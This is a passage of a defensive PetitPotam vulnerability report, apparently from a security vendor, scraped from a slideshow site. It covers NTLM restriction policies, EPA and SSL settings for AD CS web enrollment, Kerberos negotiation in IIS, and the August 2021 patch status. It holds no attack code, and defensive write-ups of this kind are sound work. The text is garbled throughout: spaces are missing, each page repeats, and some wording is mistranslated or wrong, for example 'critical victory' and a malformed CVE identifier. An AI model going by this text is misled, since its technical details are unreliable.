NTLMmustensurethattheservicesallowforauthenticationareusedasexpanded
protection(EPA)suchasprotection(EPA)orSMBsigning.Forthis,ontheServer
Managermenu,theEPAcanbeenabledforCertificateAuthorityWebEnrollment
undertheTools>InternetInformationServices(IIS)Managertab.
WiththeactivationofEPA,aWeb.configfileiscreatedunderthedirectoryof
"<%windir%>\systemdata\CES\<CAName>_CES_Kerberos\web.config".Inthisfile,
the<extendedProtectionPolicy>componentmustbesettoWhenSupportedor
ALWAYS.
TheRequireSSLoptionthatwillenableonlyHTTPSconnectionsmustbeenabled.
Methods of protection from attacks against PetitPotam
Figure 8 Security Policy Configuration
PetitPotam Vulnerability Analysis
Mitigation and Measures
ItisrecommendedtodisableNTLMauthenticationprimarilytobeprotectedfrom
attacksagainstPetitPotam.Forthis,youshouldfirstbestartedgpedit.msc.Inthe
pop-upwindow,the“ComputerConfiguration>WindowsSettings>Security
Settings>LocalPolicies>SecurityOptions”tabmustbesetto"NetworkSecurity:
RestrictNTLM:NTLMAuthenticationinthisdomain"option.
PriorityMeasuresMethods
NTLMmustensurethattheservicesallowforauthenticationareusedasexpanded
protection(EPA)suchasprotection(EPA)orSMBsigning.Forthis,ontheServer
Managermenu,theEPAcanbeenabledforCertificateAuthorityWebEnrollment
undertheTools>InternetInformationServices(IIS)Managertab.
WiththeactivationofEPA,aWeb.configfileiscreatedunderthedirectoryof
"<%windir%>\systemdata\CES\<CAName>_CES_Kerberos\web.config".Inthisfile,
the<extendedProtectionPolicy>componentmustbesettoWhenSupportedor
ALWAYS.
TheRequireSSLoptionthatwillenableonlyHTTPSconnectionsmustbeenabled.
Methods of protection from attacks against PetitPotam
Figure 8 Security Policy Configuration
26
PetitPotam Vulnerability Analysis
GroupPolicy"NetworkSecurity:RestrictNTLM:IncomingNTLMTraffic"Deactivate
NTLMonanyADCSserveronDomainusingNTLMTraffic.Forthispurpose,the
ComputerConfiguration>WindowsSettings>SecuritySettings>LocalPolicies>
SecurityOptionstab,"NetworkSecurity:RestrictNTLM:IncomingNTLMTraffic"
optionmustbesetto“Denyallaccounts”or“Denyalldomainaccounts”.
Additional measures
Figure 9 SSL Policy Configuration
Figure 10 Additional Measures
Mitigation and Measures
PetitPotam Vulnerability Analysis
GroupPolicy"NetworkSecurity:RestrictNTLM:IncomingNTLMTraffic"Deactivate
NTLMonanyADCSserveronDomainusingNTLMTraffic.Forthispurpose,the
ComputerConfiguration>WindowsSettings>SecuritySettings>LocalPolicies>
SecurityOptionstab,"NetworkSecurity:RestrictNTLM:IncomingNTLMTraffic"
optionmustbesetto“Denyallaccounts”or“Denyalldomainaccounts”.
Additional measures
Figure 9 SSL Policy Configuration
Figure 10 Additional Measures
Mitigation and Measures
27
PetitPotam Vulnerability Analysis
DeactivatetheNTLMforInternetInformationServices(IIS)ontheADCSservers
running"CertificateAuthorityWebEnrollment"or"CertificateEnrollmentWeb
Service"servicesonDomain.Forthispurpose,ontheServerManagermenu,the
Tools>InternetInformationServices(IIS)isright-clickingtheWindows
AuthenticationoptionundertheManagertab,"Negotiate:Kerberos"mustbeadded
here.
Current status on PetitPotam
ThesecurityupdatewaspublishedforPetitPotamelasticitywithAugust2021update
publishedbyMicrosoft.CV-2021-36942codegiven,hasa7.5CVSSscore.
PetitPotamvulnerablecyber-threatactorwithanauthenticatedcyber-threat,can
callafunctionintheLSARPCinterfaceandforcethedomaincontrollerto
authenticateonanotherserverusingNTLM(DomainController).Thepublished
securityupdatepreventsOpenEncryptedFileRawAandOpenEncryptedFileRawW
callswithaffectedAPIcallsthroughtheLSARPCinterface.
Mitigation and Measures
Figure 11 Negotiate Kerberos
PetitPotam Vulnerability Analysis
DeactivatetheNTLMforInternetInformationServices(IIS)ontheADCSservers
running"CertificateAuthorityWebEnrollment"or"CertificateEnrollmentWeb
Service"servicesonDomain.Forthispurpose,ontheServerManagermenu,the
Tools>InternetInformationServices(IIS)isright-clickingtheWindows
AuthenticationoptionundertheManagertab,"Negotiate:Kerberos"mustbeadded
here.
Current status on PetitPotam
ThesecurityupdatewaspublishedforPetitPotamelasticitywithAugust2021update
publishedbyMicrosoft.CV-2021-36942codegiven,hasa7.5CVSSscore.
PetitPotamvulnerablecyber-threatactorwithanauthenticatedcyber-threat,can
callafunctionintheLSARPCinterfaceandforcethedomaincontrollerto
authenticateonanotherserverusingNTLM(DomainController).Thepublished
securityupdatepreventsOpenEncryptedFileRawAandOpenEncryptedFileRawW
callswithaffectedAPIcallsthroughtheLSARPCinterface.
Mitigation and Measures
Figure 11 Negotiate Kerberos
28
PetitPotam Vulnerability Analysis
Current Status on PetitPotam
MicrosofthasupdatedtheEfsRpcOpenFileRaw_Down-levelfunctioninefslsaext.dll
intheupdate.TheOpenEncryptedFileRawfunctioncontrolsaregistryvaluenamed
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EFS.Ifthisvalueis
equalandequalto1,theOpenEncryptedFileRawworksaspreviously.Problemsmay
occurinthebackupsystemifthepublishedupdateisimplemented.Systemscanbe
correctedbydisablingthechangedparametervalue,butitisvulnerableto
PetitPotamvulnerability.
Mitigation and Measures
Figure 12 After Updating EfsRpcOpenFileRaw_Down-level function
PetitPotam Vulnerability Analysis
Current Status on PetitPotam
MicrosofthasupdatedtheEfsRpcOpenFileRaw_Down-levelfunctioninefslsaext.dll
intheupdate.TheOpenEncryptedFileRawfunctioncontrolsaregistryvaluenamed
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EFS.Ifthisvalueis
equalandequalto1,theOpenEncryptedFileRawworksaspreviously.Problemsmay
occurinthebackupsystemifthepublishedupdateisimplemented.Systemscanbe
correctedbydisablingthechangedparametervalue,butitisvulnerableto
PetitPotamvulnerability.
Mitigation and Measures
Figure 12 After Updating EfsRpcOpenFileRaw_Down-level function
29
2021 –Q3 SiberİstihbaratRaporu
Conclusion
PetitpotamelementisarathercriticalvictorythataffectsWindowssystems.Inthis
report,itismentionedthatpetitpotamweaknessiswhatiscausedbycause,which
systemsaffect,howtobeexploitedandtobetakenagainstvictory.Itisimportantto
implementthesecurityupdatespublishedtoavoidtheattacksthattarget
petitpotametch.Iftheupdateisnotapplied,thereceiptofsaidprecautionsarevery
importantintermsofthesafetyofthesystems.
Reference
0Patch.(2021,Ağustos6).0PatchWebsitesi:https://blog.0patch.com/2021/08/
free-micropatches-for-petitpotam.html
Conclusion
2021 –Q3 SiberİstihbaratRaporu
Conclusion
PetitpotamelementisarathercriticalvictorythataffectsWindowssystems.Inthis
report,itismentionedthatpetitpotamweaknessiswhatiscausedbycause,which
systemsaffect,howtobeexploitedandtobetakenagainstvictory.Itisimportantto
implementthesecurityupdatespublishedtoavoidtheattacksthattarget
petitpotametch.Iftheupdateisnotapplied,thereceiptofsaidprecautionsarevery
importantintermsofthesafetyofthesystems.
Reference
0Patch.(2021,Ağustos6).0PatchWebsitesi:https://blog.0patch.com/2021/08/
free-micropatches-for-petitpotam.html
Conclusion
30
PetitPotam Vulnerability Analysis
Conclusion
PetitPotamisaverycriticalvulnerabilitythataffectsWindowssystems.Inthisreport,
issuessuchaswhataPetitPotamvulnerabilityis,whyitoriginates,whatsystemsit
affects,howitcanbeexploited,andmeasuresthatcanbetakenagainstthe
vulnerabilityarediscussed.Itisimportanttoimplementthesecurityupdates
releasedtoavoidbeingaffectedbyattackstargetingthePetitPotamvulnerability.If
theupdateisnotapplied,thereceiptofsaidprecautionsareveryimportantinterms
ofthesafetyofthesystems.
BRANDEFENSE.COM
+90 (850) 303 85 35
[email protected]
/Brandefense
/brandefense
/brandefense
PetitPotam Vulnerability Analysis
Conclusion
PetitPotamisaverycriticalvulnerabilitythataffectsWindowssystems.Inthisreport,
issuessuchaswhataPetitPotamvulnerabilityis,whyitoriginates,whatsystemsit
affects,howitcanbeexploited,andmeasuresthatcanbetakenagainstthe
vulnerabilityarediscussed.Itisimportanttoimplementthesecurityupdates
releasedtoavoidbeingaffectedbyattackstargetingthePetitPotamvulnerability.If
theupdateisnotapplied,thereceiptofsaidprecautionsareveryimportantinterms
ofthesafetyofthesystems.
BRANDEFENSE.COM
+90 (850) 303 85 35
[email protected]
/Brandefense
/brandefense
/brandefense
Categories
GeneralDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 1
- Slides 30
- Age 58 days
Related Slideshows
22
Pray For The Peace Of Jerusalem and You Will Prosper
RodolfoMoralesMarcuc
32 views
26
Don_t_Waste_Your_Life_God.....powerpoint
chalobrido8
34 views
31
VILLASUR_FACTORS_TO_CONSIDER_IN_PLATING_SALAD_10-13.pdf
JaiJai148317
31 views
14
Fertility awareness methods for women in the society
Isaiah47
30 views
35
Chapter 5 Arithmetic Functions Computer Organisation and Architecture
RitikSharma297999
28 views
5
syakira bhasa inggris (1) (1).pptx.......
ourcommunity56
30 views